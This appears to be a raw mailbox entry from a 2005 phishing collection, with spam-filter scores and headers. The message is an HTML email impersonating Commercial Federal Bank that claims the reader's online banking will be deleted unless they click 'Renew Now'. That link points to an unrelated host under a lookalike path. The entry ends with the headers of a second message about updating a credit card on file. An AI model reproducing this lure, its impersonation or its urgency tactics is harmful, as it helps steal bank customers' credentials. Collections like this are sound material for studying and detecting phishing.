	*  0.0 NO_REAL_NAME From: does not include a real name
	*  0.0 RCVD_IN_SORBS_HTTP RBL: SORBS: sender is open HTTP proxy server
	*      [211.183.161.134 listed in dnsbl.sorbs.net]
	*  1.2 RCVD_IN_BL_SPAMCOP_NET RBL: Received via a relay in bl.spamcop.net
	*      [Blocked - see <http://www.spamcop.net/bl.shtml?211.183.161.134>]
	*  3.1 RCVD_IN_XBL RBL: Received via a relay in Spamhaus XBL
	*      [211.183.161.134 listed in sbl-xbl.spamhaus.org]
Message-Id: <20051004130919.7069C6FA36A@mail2.monkey.org>
Content-Length: 1880
Lines: 19
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 298

<FONT face=Arial size=2><IMG src="http://www.ddfl.org/furryscurry/logos/commercial.gif"><BR><BR><BR>&nbsp;&nbsp;&nbsp;Dear Commercial&nbsp;Federal Bank&nbsp;Customer,<BR>&nbsp; 
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp; This is your official notification from Commercial&nbsp;Federal Bank that the service(s) listed below<BR>&nbsp;&nbsp; will be deactivated and deleted if not renewed immediately. Previous notifications have<BR>&nbsp;&nbsp; been sent to the Access<i>Online</i> Contact assigned to this account. As the Primary Contact, you<BR>&nbsp;&nbsp; must renew the service(s) listed below or it will be deactivated and deleted. <A onfiltered="return ShowLinkWarning()" href="http://ns.jasin.co.kr/comfedbank.com/index.htm" onclick="return ShowLinkWarning()"><FONT color=#003399>Renew Now</FONT></A></DIV>
<DIV><FONT color=#003399></FONT>&nbsp;</DIV>
<DIV><BR>&nbsp;&nbsp; SERVICE : Commercial&nbsp;Federal Bank&nbsp;<EM></EM>Access<i>Online</i> with Bill Payment.<BR>&nbsp;&nbsp; EXPIRATION: October&nbsp;15, 2005</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR>&nbsp;&nbsp; Thank you,</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp;&nbsp;Commercial&nbsp;Federal Bank&nbsp;Online Banking Support, N.A.</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR>&nbsp;&nbsp; *****************************************************************************<BR>&nbsp;&nbsp; IMPORTANT CUSTOMER SUPPORT INFORMATION<BR>&nbsp;&nbsp; *****************************************************************************</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp; Please do not reply to this message. For any inquiries, contact Customer Service.</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp; Document Reference: (92051208).</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp; Commercial&nbsp;Federal Bank, N.A. Member FDIC.&nbsp; Equal Housing Lender.<BR>&nbsp;&nbsp; Copyright  2005 Commercial&nbsp;Federal Bank, N.A. All rights reserved.</DIV></FONT>

yzdvug

From auburn@mail.geo.ua.edu  Tue Oct  4 10:52:32 2005
Return-Path: <auburn@mail.geo.ua.edu>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id A392D536E17
	for <jose@login.monkey.org>; Tue,  4 Oct 2005 10:52:32 -0400 (EDT)
Received: from mail2.monkey.org (localhost.monkey.org [127.0.0.1])
	by mail2.monkey.org (Postfix) with ESMTP id 5F8C66FA319
	for <jose@monkey.org>; Tue,  4 Oct 2005 10:52:29 -0400 (EDT)
Received: from mail.geo.ua.edu (unknown [130.160.200.98])
	by mail2.monkey.org (Postfix) with ESMTP
	for <jose@monkey.org>; Tue,  4 Oct 2005 10:52:29 -0400 (EDT)
Received: by mail.geo.ua.edu (Postfix, from userid 1045)
	id 041722476AEA; Tue,  4 Oct 2005 09:50:08 -0500 (CDT)
To: jose@monkey.org
Subject: Place or Update Credit Card on File 
